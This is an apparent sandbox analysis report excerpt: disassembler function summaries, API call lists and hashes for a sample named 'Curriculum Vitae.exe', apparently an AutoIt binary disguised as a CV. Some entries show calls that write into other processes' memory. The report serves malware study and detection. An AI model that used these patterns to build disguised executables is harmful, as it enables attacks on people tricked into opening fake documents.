                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 0bbe187f3da50715bd923f4270638ff549817383af39d73b3b46d3999161f560
                      • Instruction ID: e2e7ff58f21d410a672fcf4735150cd4c0c4384561ed9236bfb9de02160ef877
                      • Opcode Fuzzy Hash: 0bbe187f3da50715bd923f4270638ff549817383af39d73b3b46d3999161f560
                      • Instruction Fuzzy Hash: EC018630550B05ABEF215B10EE4EFA677B8FB00B05F041569E787A15E1DBF0A9848FB0
                      APIs
                      • _free.LIBCMT ref: 00D622BE
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D622D0
                      • _free.LIBCMT ref: 00D622E3
                      • _free.LIBCMT ref: 00D622F4
                      • _free.LIBCMT ref: 00D62305
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: fad8565cdb62d05057c609b34be1bb18735495e3d4b093f8b08b8fe657817570
                      • Instruction ID: b6b916bed622a01396b775bb2f797c7c798dcecba5ddf983b7ad8c18e2472d25
                      • Opcode Fuzzy Hash: fad8565cdb62d05057c609b34be1bb18735495e3d4b093f8b08b8fe657817570
                      • Instruction Fuzzy Hash: CEF05E70A50A658FC71AAF95BC019283BA4F7187A1B05554BF410F63B9CB3208A5FFF5
                      APIs
                      • EndPath.GDI32(?), ref: 00D495D4
                      • StrokeAndFillPath.GDI32(?,?,00D871F7,00000000,?,?,?), ref: 00D495F0
                      • SelectObject.GDI32(?,00000000), ref: 00D49603
                      • DeleteObject.GDI32 ref: 00D49616
                      • StrokePath.GDI32(?), ref: 00D49631
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: f5c319dce524755abc9e91d25787d3a23c5e7ca62b7105325100999bfdab8408
                      • Instruction ID: fc2a0d48ab8b42edc6b4a4adb3bddeb583e4e4e2e9313cdb632f4d61430a7342
                      • Opcode Fuzzy Hash: f5c319dce524755abc9e91d25787d3a23c5e7ca62b7105325100999bfdab8408
                      • Instruction Fuzzy Hash: D4F01931005306EFDB125F67ED2CB653B61AB80362F588254F569A91F0C7328999DF30
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __freea$_free
                      • String ID: a/p$am/pm
                      • API String ID: 3432400110-3206640213
                      • Opcode ID: ba04c1dd9d4b420c78dec39ae2decf088c514a48f0bc0aede35a98a887dfa86a
                      • Instruction ID: b87a06bba6445d6aec4eaa8bad2383f0ef1ab32f9b9b7e4f91a793f05e4ea445
                      • Opcode Fuzzy Hash: ba04c1dd9d4b420c78dec39ae2decf088c514a48f0bc0aede35a98a887dfa86a
                      • Instruction Fuzzy Hash: C7D1F039900206DBDB289F68C856BFAB7B1FF16300F2C4259E946AB750D3759D80CBB5
                      APIs
                        • Part of subcall function 00D50242: EnterCriticalSection.KERNEL32(00E0070C,00E01884,?,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5024D
                        • Part of subcall function 00D50242: LeaveCriticalSection.KERNEL32(00E0070C,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5028A
                        • Part of subcall function 00D500A3: __onexit.LIBCMT ref: 00D500A9
                      • __Init_thread_footer.LIBCMT ref: 00DB6238
                        • Part of subcall function 00D501F8: EnterCriticalSection.KERNEL32(00E0070C,?,?,00D48747,00E02514), ref: 00D50202
                        • Part of subcall function 00D501F8: LeaveCriticalSection.KERNEL32(00E0070C,?,00D48747,00E02514), ref: 00D50235
                        • Part of subcall function 00DA359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DA35E4
                        • Part of subcall function 00DA359C: LoadStringW.USER32(00E02390,?,00000FFF,?), ref: 00DA360A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                      • String ID: x#$x#$x#
                      • API String ID: 1072379062-1894725482
                      • Opcode ID: 7e84e6af1bf802b658293e4a8099687caee5328d9b763665246e1f87e1743e6e
                      • Instruction ID: 92e9c0407dabdab98ce624159bf42b9526c0fd4bb0faab5272bcb21872a05ae2
                      • Opcode Fuzzy Hash: 7e84e6af1bf802b658293e4a8099687caee5328d9b763665246e1f87e1743e6e
                      • Instruction Fuzzy Hash: C0C14A71A00105EFDB24DF98C895EEEB7B9EF48300F148069E946AB291DB74E945CBB0
                      APIs
                        • Part of subcall function 00D50242: EnterCriticalSection.KERNEL32(00E0070C,00E01884,?,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5024D
                        • Part of subcall function 00D50242: LeaveCriticalSection.KERNEL32(00E0070C,?,00D4198B,00E02518,?,?,?,00D312F9,00000000), ref: 00D5028A
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D500A3: __onexit.LIBCMT ref: 00D500A9
                      • __Init_thread_footer.LIBCMT ref: 00DB7BFB
                        • Part of subcall function 00D501F8: EnterCriticalSection.KERNEL32(00E0070C,?,?,00D48747,00E02514), ref: 00D50202
                        • Part of subcall function 00D501F8: LeaveCriticalSection.KERNEL32(00E0070C,?,00D48747,00E02514), ref: 00D50235
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                      • String ID: 5$G$Variable must be of type 'Object'.
                      • API String ID: 535116098-3733170431
                      • Opcode ID: fa641020582c72c3f1c953d03f2a69c374c4e4322d691e6cdf71659237013955
                      • Instruction ID: 4ecde2f70b94279537968d22c8cda5404252011270f7d6cf18d58ad48d82d0b8
                      • Opcode Fuzzy Hash: fa641020582c72c3f1c953d03f2a69c374c4e4322d691e6cdf71659237013955
                      • Instruction Fuzzy Hash: A4916974A04209EFCB14EF54D8919EDBBB1EF88300F148059F846AB292DB71AE85CB71
                      APIs
                        • Part of subcall function 00D9B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D921D0,?,?,00000034,00000800,?,00000034), ref: 00D9B42D
                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D92760
                        • Part of subcall function 00D9B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00D9B3F8
                        • Part of subcall function 00D9B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00D9B355
                        • Part of subcall function 00D9B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D92194,00000034,?,?,00001004,00000000,00000000), ref: 00D9B365
                        • Part of subcall function 00D9B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D92194,00000034,?,?,00001004,00000000,00000000), ref: 00D9B37B
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D927CD
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D9281A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                      • String ID: @
                      • API String ID: 4150878124-2766056989
                      • Opcode ID: 44db225e8f72893d45239c52e0c39301d8f87ac7c2c8947ced80536e1829aea7
                      • Instruction ID: d2356356b609f7597f7d33314351baccb42417d025776b21f1e1dd637272e11b
                      • Opcode Fuzzy Hash: 44db225e8f72893d45239c52e0c39301d8f87ac7c2c8947ced80536e1829aea7
                      • Instruction Fuzzy Hash: CA412676900219BEDF10DBA4D982EEEBBB8EF09310F004099EA55B7191DA706E45CBB0
                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Curriculum Vitae.exe,00000104), ref: 00D61769
                      • _free.LIBCMT ref: 00D61834
                      • _free.LIBCMT ref: 00D6183E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Users\user\Desktop\Curriculum Vitae.exe
                      • API String ID: 2506810119-3591430144
                      • Opcode ID: a810816ef223f9d240866ec20bd3c17b94b7d7ab66fb2056fe26e7a2ae37cc76
                      • Instruction ID: 4a15508833d44d884cd2ab3532b033142bc4ea39157b532d04d280a065564f93
                      • Opcode Fuzzy Hash: a810816ef223f9d240866ec20bd3c17b94b7d7ab66fb2056fe26e7a2ae37cc76
                      • Instruction Fuzzy Hash: 9D316179A00258FFDB21DB999885D9EBBFCEB85310B1841A6F804E7211D6708E44DBB0
                      APIs
                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D9C306
                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00D9C34C
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E01990,016E75E0), ref: 00D9C395
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem
                      • String ID: 0
                      • API String ID: 135850232-4108050209
                      • Opcode ID: 5a75aaa133dbd0f7b0e4bf6f9a1e8c69af3ed299a307e04f1cea98dc2df2b629
                      • Instruction ID: efc24f517770b35f780d27b88303dd4db5d61610d611294f461bce213aba250d
                      • Opcode Fuzzy Hash: 5a75aaa133dbd0f7b0e4bf6f9a1e8c69af3ed299a307e04f1cea98dc2df2b629
                      • Instruction Fuzzy Hash: D9419F712143029FDB20DF29D885B5ABBE4EF85320F149A1DF9A5972D1D770E904CB72
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DCCC08,00000000,?,?,?,?), ref: 00DC44AA
                      • GetWindowLongW.USER32 ref: 00DC44C7
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC44D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: ca45a54944a135c412eca7a7132e397414f82df214ddf06ddfb03798113cc8ea
                      • Instruction ID: 35006ebafdaf0be9b7f56db10021dafb03c43f5d1fe3e554f17721b7a133f113
                      • Opcode Fuzzy Hash: ca45a54944a135c412eca7a7132e397414f82df214ddf06ddfb03798113cc8ea
                      • Instruction Fuzzy Hash: 36316A31214606AFDB258E78DC55FEA7BA9EB08324F244719F979932E0D770A8509770
                      APIs
                        • Part of subcall function 00DB335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DB3077,?,?), ref: 00DB3378
                      • inet_addr.WSOCK32(?), ref: 00DB307A
                      • _wcslen.LIBCMT ref: 00DB309B
                      • htons.WSOCK32(00000000), ref: 00DB3106
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                      • String ID: 255.255.255.255
                      • API String ID: 946324512-2422070025
                      • Opcode ID: e004da45cee0693e5e5c7526c59451c82124fcb39ee1fbb503b149461eabe9e5
                      • Instruction ID: 5a3d7263c6422883a079aeca891a8e6aca6d19f499905287c88ada925b98023e
                      • Opcode Fuzzy Hash: e004da45cee0693e5e5c7526c59451c82124fcb39ee1fbb503b149461eabe9e5
                      • Instruction Fuzzy Hash: 7A31AF39604205DFCB10DF28C885EAA77E4EF54358F688059E9168B392DB72EE45DB70
                      APIs
                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DC4705
                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DC4713
                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DC471A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$DestroyWindow
                      • String ID: msctls_updown32
                      • API String ID: 4014797782-2298589950
                      • Opcode ID: 8dbb128f541bba4dce1a01f08f5e86e86df7ef3fb0addb8609ad900a488f4cce
                      • Instruction ID: b11ce1c3b50357b57bf373ae71e672a72c33aaecebda0f504410aad1d5fc6477
                      • Opcode Fuzzy Hash: 8dbb128f541bba4dce1a01f08f5e86e86df7ef3fb0addb8609ad900a488f4cce
                      • Instruction Fuzzy Hash: 702131B560020AAFDB11DF64DC91EB737ADEF5A364B040059FA049B391D771EC51CA70
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                      • API String ID: 176396367-2734436370
                      • Opcode ID: 0813cb935c3c51a9357149be19a9e76869c3aae149a7fb705c0351f55264fc85
                      • Instruction ID: f94275f82a941ab2cfe7ce3e2cd7d43fec8de15be8bb1305c5617b85dc8964c1
                      • Opcode Fuzzy Hash: 0813cb935c3c51a9357149be19a9e76869c3aae149a7fb705c0351f55264fc85
                      • Instruction Fuzzy Hash: 1C21087220455166DB31AB2C9C22FB7F3A9DF51311F18402EFD4997141EB51ED45C2F6
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DC3840
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DC3850
                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DC3876
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 3c0468bfc78c0f22c4e004954022252ba9294749a9e4c1b1abb523d7d0016102
                      • Instruction ID: c5d670336002b6d53002eec094216a9fe2b6472de9f5a0019f33d24053067d1b
                      • Opcode Fuzzy Hash: 3c0468bfc78c0f22c4e004954022252ba9294749a9e4c1b1abb523d7d0016102
                      • Instruction Fuzzy Hash: 49217C7261021ABBEB219F54DC85FAB376AEF89750F158128FA049B190C672DC528BB0
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA4A08
                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DA4A5C
                      • SetErrorMode.KERNEL32(00000000,?,?,00DCCC08), ref: 00DA4AD0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume
                      • String ID: %lu
                      • API String ID: 2507767853-685833217
                      • Opcode ID: 1bd4b3c6005ecee2cc9917f0dfff3fad295b625071a15f77ae3244e1c0aa45a5
                      • Instruction ID: 60152ec0d4d2dfe7d955ed7fd44cc2d2a848c7262150e2f86a61db4764a1d126
                      • Opcode Fuzzy Hash: 1bd4b3c6005ecee2cc9917f0dfff3fad295b625071a15f77ae3244e1c0aa45a5
                      • Instruction Fuzzy Hash: 67310C75A00209AFDB10DF54C985EAABBF8EF49308F1880A9E909DB252D771ED45CB71
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DC424F
                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DC4264
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DC4271
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: bb1cbe1a0a634907b9aaf6f39c525319738145639874cb022c1ed9ed7c134ccf
                      • Instruction ID: 69f419456e3deb73a03af22b38af3d4d73e9e9e46dd32e3709bca1c5d2cab944
                      • Opcode Fuzzy Hash: bb1cbe1a0a634907b9aaf6f39c525319738145639874cb022c1ed9ed7c134ccf
                      • Instruction Fuzzy Hash: 7D110631240209BEEF205F29CC06FAB7BACEF85B54F014118FA55E70A0D271DC519B34
                      APIs
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                        • Part of subcall function 00D92DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D92DC5
                        • Part of subcall function 00D92DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D92DD6
                        • Part of subcall function 00D92DA7: GetCurrentThreadId.KERNEL32 ref: 00D92DDD
                        • Part of subcall function 00D92DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D92DE4
                      • GetFocus.USER32 ref: 00D92F78
                        • Part of subcall function 00D92DEE: GetParent.USER32(00000000), ref: 00D92DF9
                      • GetClassNameW.USER32(?,?,00000100), ref: 00D92FC3
                      • EnumChildWindows.USER32(?,00D9303B), ref: 00D92FEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                      • String ID: %s%d
                      • API String ID: 1272988791-1110647743
                      • Opcode ID: 1e6ae46e6729868b3e84bb3152860c050968d15b37d3da67d0d98c7e09fd48d8
                      • Instruction ID: 2d8ab1d81d7e4a8210bc4608f16e7b58ed70aff8f360af340b4297fe4566159f
                      • Opcode Fuzzy Hash: 1e6ae46e6729868b3e84bb3152860c050968d15b37d3da67d0d98c7e09fd48d8
                      • Instruction Fuzzy Hash: DA1181716002066BCF147F749C89EFE776AEF94304F049075FA0D9B292DE7099498B70
                      APIs
                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DC58C1
                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DC58EE
                      • DrawMenuBar.USER32(?), ref: 00DC58FD
                      Strings
                      Memory Dump Source
